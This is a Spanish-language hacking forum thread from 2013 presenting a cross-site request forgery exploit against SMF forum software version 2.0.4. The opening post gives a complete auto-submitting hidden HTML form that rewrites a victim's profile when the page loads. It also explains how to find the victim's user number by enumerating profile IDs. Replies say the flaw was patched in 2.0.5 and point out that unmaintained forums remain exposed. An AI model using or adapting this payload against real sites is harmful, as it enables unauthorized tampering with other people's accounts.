[CSRF] [SMF] Cambiar perfil

Iniciado por Réplica1, Agosto 26, 2013, 08:12:44 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Agosto 26, 2013, 08:12:44 PM
Hoy os traigo un csrf en SMF.

Esto es importante, en la ultima linea:

Código: php
<input type="hidden" name="u" value="94">


En value, donde pone '94' ahí que poner el numero de perfil de la victima es tan fácil como ir a tu perfil y ir cambiando el ultimo numero asta que encuentres su perfil.


Código: php
<script>
function envio_csrf()
{
document.csrf1.submit()
}
</script>
<form action="http://foro.com/foro/index.php?action=profile;area=forumprofile" method=post name="csrf1">
<input type="hidden" name="avatar_choice" value="none">
<input type="hidden" name="personal_text" value="P3K4D0R">
<input type="hidden" name="bday3" value="6666">
<input type="hidden" name="bday1" value="01">
<input type="hidden" name="bday2" value="12">
<input type="hidden" name="location" value="Mongolia">
<input type="hidden" name="msn" value="[email protected]">
<input type="hidden" name="usertitle" value="Pekador">
<input type="hidden" name="signature" value="Underc0de">
<input type="hidden" name="website_title" value="Underc0de">
<input type="hidden" name="website_url" value="Underc0de.org">
<input type="hidden" name="button_submit" value="Cambiar perfil">
<input type="hidden" name="u" value="94">
<body onload="envio_csrf()">


Reportado: Sí, y fixeado en todas las versiones.
Agosto 26, 2013, 08:59:53 PM #1
Muy bueno!
A que versiones de SMF afecta?

Saludos!
ANTRAX

Agosto 26, 2013, 09:09:01 PM #2 Ultima modificación: Agosto 26, 2013, 09:13:17 PM por xPekador
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy bueno!
A que versiones de SMF afecta?

Saludos!
ANTRAX

Afectava a la 2.0.4,  pero al reportarla la fixearon a las horas y con algunas fallas mas sacaron la 2.0.5.

Ahora para verificar al aceptar usa tu pass y user encryptados en md5 si no me equivoco y se tendria que tener el user y pass, y no tendria sentido ya que tendrias la cuenta y puedes hacerlo manualmente.

- Saludos;)
Agosto 26, 2013, 09:58:47 PM #3
Genial! muchas gracias! Siempre hay foros que no actualizan por que no estan muy bien mantenidos..!

Saludos!
ANTRAX

Agosto 26, 2013, 10:17:31 PM #4
esta muy bueno amigo, muchas gracias !
Agosto 26, 2013, 10:42:01 PM #5
Muchas gracias por comentar, mañana publicare todos los csrf de foros miarroba que tengo y son bastantes!

Saludos  ;)
Imprimir
Ir Arriba Páginas1
Acciones del Usuario